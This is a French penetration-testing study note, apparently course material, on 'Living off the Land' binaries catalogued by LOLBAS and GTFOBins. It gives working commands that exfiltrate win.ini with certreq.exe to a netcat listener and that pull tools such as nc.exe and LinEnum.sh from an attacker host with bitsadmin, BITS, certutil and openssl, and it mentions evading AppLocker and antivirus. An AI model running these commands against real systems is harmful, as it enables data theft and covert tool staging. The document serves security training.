Living off The Land

L'expression "Living off the land" (vivre des ressources locales) a été introduite par Christopher Campbell (@obscuresec) et Matt Graeber (@mattifestation) lors de DerbyCon 3. Elle désigne l'utilisation de binaires et d'outils déjà présents sur un système cible pour mener des actions offensives, sans introduire de nouveaux fichiers suspects.

Le terme LOLBins (Living off the Land Binaries) est apparu pour désigner ces exécutables Windows détournés de leur usage initial.

Deux projets principaux recensent ces binaires :

• 🔹 LOLBAS pour les binaires Windows

• 🔹 GTFOBins pour les binaires Unix/Linux

🧰 Fonctions possibles avec les LOTL Binaries

Les binaires répertoriés dans ces projets permettent d'effectuer plusieurs types d'actions :

• 📥 Téléchargement de fichiers

• 📤 Téléversement de fichiers

• 🧨 Exécution de commandes

• 📖 Lecture de fichiers

• ✏️ Écriture de fichiers

• 🕵️ Contournement de restrictions (ex: AppLocker, antivirus)

---

🪟 Utilisation de LOLBAS (Windows)

🔎 Recherche sur le site

Pour rechercher les capacités de transfert de fichiers :

• /download pour télécharger

• /upload pour téléverser

🧪 Exemple avec CertReq.exe

CertReq.exe peut être utilisé pour envoyer un fichier via une requête HTTP POST.

Étapes :

1. Sur la machine d'attaque, démarrer un listener netcat :

sudo nc -lvnp 8000

1. Sur la machine cible Windows :

certreq.exe -Post -config http://<IP ATTAQUANT>:8000/ C:\Windows\win.ini

Résultat attendu (extrait Netcat) :

POST / HTTP/1.1
...
[files]
[Mail]
MAPI=1

⚠️ Si l’option -Post est indisponible, il peut être nécessaire d'utiliser une version plus récente de CertReq.exe.

---

🐧 Utilisation de GTFOBins (Linux)

🔎 Recherche sur le site

Utiliser les filtres +file upload ou +file download pour trouver les binaires associés.

🧪 Exemple avec openssl

OpenSSL permet d'envoyer un fichier vers un client, de manière similaire à netcat.

1. Générer un certificat sur la machine d’attaque :

openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

2. Lancer un serveur :

openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

3. Depuis la machine cible (Linux) :

openssl s_client -connect <IP ATTAQUANT>:80 -quiet > LinEnum.sh

---

🧰 Autres outils courants

🔸 Bitsadmin (Windows)

Permet de télécharger des fichiers via HTTP ou SMB.

bitsadmin /transfer wcb /priority foreground http://<IP ATTAQUANT>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

🔸 PowerShell (BITS)

Import-Module bitstransfer;
Start-BitsTransfer -Source "http://<IP ATTAQUANT>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

🔸 Certutil

Binaires Windows utilisés comme alternative à wget. Attention : souvent détecté par l’AMSI.

certutil.exe -verifyctl -split -f http://<IP ATTAQUANT>:8000/nc.exe

---

🧪 Bonnes pratiques d’entraînement

Il est fortement conseillé d’expérimenter un maximum de méthodes de transfert de fichiers issues des projets LOLBAS et GTFOBins. Certains binaires inattendus peuvent offrir des capacités intéressantes lors d’un test d’intrusion.

💡 Préparer à l'avance des snippets prêts à l'emploi pour chaque méthode peut faire gagner un temps précieux en situation réelle.

---

📚 Ressources utiles

• LOLBAS Project (Windows)

• GTFOBins (Linux)

• Certutil - SubTee

• Cheatsheet GTFOBins (HackTricks)

---